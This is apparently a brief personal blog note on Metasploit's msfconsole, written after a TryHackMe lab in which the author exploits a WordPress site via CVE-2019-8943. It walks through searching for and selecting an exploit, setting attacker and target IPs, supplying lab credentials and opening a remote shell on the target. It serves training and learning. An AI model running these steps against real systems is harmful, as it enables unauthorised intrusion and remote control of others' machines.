msfconsole Note

, , , ,

Before all

While I was exploiting the blog lab on Tryhackme today, I was unable to exploit the wordpress site with cve 2019-8943 python poc, so I finally tried this out and succeeded.
There are still a lot of usage and methods I think, so this post would be updated in future.

Note

All usage with msfconsole should be done after RECON.

  • search for vulnerabilities: 

    1
    search <keyword>

    image

  • use an exploit 

    1
    use <#id/filename>

    image

  • set Target IP and attacker’s IP 

    1
    2
    set LHOST <attacker's IP>
    set RHOST <Target IP>

    image

  • exploit 

    1
    exploit

    image

  • error?
    According to the error message above, I need to use the exploit with the account/password I found before and exploit it again. 

    1
    2
    set USERNAME kwheel
    set PASSWORD cutiepie1

    image

  • shell 

    1
    shell

    Get shell~
    image